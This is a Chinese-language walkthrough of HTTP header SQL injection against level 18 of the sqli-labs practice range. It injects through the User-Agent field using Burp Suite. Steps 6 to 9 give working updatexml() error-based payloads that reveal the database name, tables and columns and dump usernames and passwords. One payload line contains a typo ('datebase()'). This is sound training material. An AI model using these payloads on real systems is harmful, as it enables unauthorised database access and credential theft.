sql注入HTTP头部注入

HTTP头部注入

原理： 一般在通过获取头部的信息用于数据的分析，通过头部可以向数据库发送查询信息，所以构造恶意的语句结构就可以向数据库进行信息查询。本次HTTP头部注入实验将在sqlilabs靶场中的第十八题进行注入

1. 此图片为sqlilabs靶场中第十八题中的php代码环境，从代码环境中，我们可以分析到对于Post注入方式，还是通过魔术引号的方式进行了防护，但是在红框中的代码却露出了马脚

$ uagent = $_SERVER [‘HTTP_USER_AGENT’];
$ IP = $_SERVER [‘REMOTE_ADDR’];

• 这两段代码中 $_SERVER是PHP中预定义变量符，可以获取头部信息，路径信息，IP信息。PHP文件中表示获取头部信息与当前主机ip信息
• 本题中注入的点应该是围绕着$ uagent头部信息进行注入。

数组元素	说明信息
$_SERVER[‘SERVER_NAME’]	当前运行脚本所在服务器的主机名。
$_SERVER[‘SERVER_PROTOCOL’]	请求页面时通信协议的名称和版本。例如：HTTP/1.0
$_SERVER[‘SERVER_ADDR’]	当前运行脚本所在服务器的 IP 地址
$_SERVER[‘REQUEST_METHOD’]	访问页面使用的请求方法。例如“GET”“HEAD”“POST”“PUT”
$_SERVER[‘REMOVE_ADDR’]	浏览当前页面的用户 IP 地址，注意与 $_SERVER[‘SERVER_ADDR’] 的区别
$_SERVER[‘SCRIPT_FILENAME’]	当前执行脚本的绝对路径
$_SERVER[‘SCRIPT_NAME’]	包含当前脚本的路径
$_SERVER[‘REQUEST_URI’]	URI 用来指定要访问的页面。例如，“index.html”
$_SERVER[‘DOCUMENT_ROOT’]	当前运行脚本所在的文档根目录。在服务器配置文件中定义

3. 我们已经知道了http头部注入，从头部的内容拿到insert基于报错注入。

• insert语句：insert是在mysql数据库中作为放入字段数据的执行指令。

insert into member(username,pw,sex,phonenum,email,address) values(‘xx’,‘xx’,‘xx’,‘xx’,‘xx’,‘xx’,‘xx’,)

• 所以我们构造payload基于函数的报错注入。

updatexml() : MYSQL对xml文档数据进行查询和修改的XPATH函数
updatexml(xml_document,XPathstring,new_value) :表名，路径（路径错误会报错），替换的值
extractvalue() :MYSQL对xml文档数据进行查询XPATH函数
floor() :MYSQL中用来取整的函数

4. 我们使用burpsuite对第十八题进行抓包分析

• 打开burpsuite的Intercept is on开关
  
• 对十八题靶场中随便输入账户密码进行包的抓取
  
• 右击保存在Repeater中进行编辑
  
  

5. 通过在User-Agent字段后面添加单引号查看是否有报错来判断是否存在注入点

• 如下图所示，在User-Agent后面添加后出现了报错，存在HTTP头部注入
  

6. 通过报错注入发现数据库信息

• 使用payload构造，使用报错函数updatexml其中0X7e表示的是 ~ 这个符号 ，concat函数用于将两个字段拼接

’ or updatexml(1,concat(0x7e,(database())),1) ,’’,’’)#
’ or updatexml(1,concat(0x7e,(datebase())),1) or ‘1’='1

7. 通过database()参数位置进行更改，查询到数据库下的所有表信息

’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)),1) ,’’,’’)#

8. 通过上一步中找到的所以表的信息，我们可以继续查询表下面所对应的字段名称

’ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’)),1) ,’’,’’)#

9. 查询到了字段名称，也就相当于表中的数据我们也是可以手到擒来了

’ or updatexml(1,concat(0x7e,(select group_concat(username,password1) from users)),1) ,’’,’’)#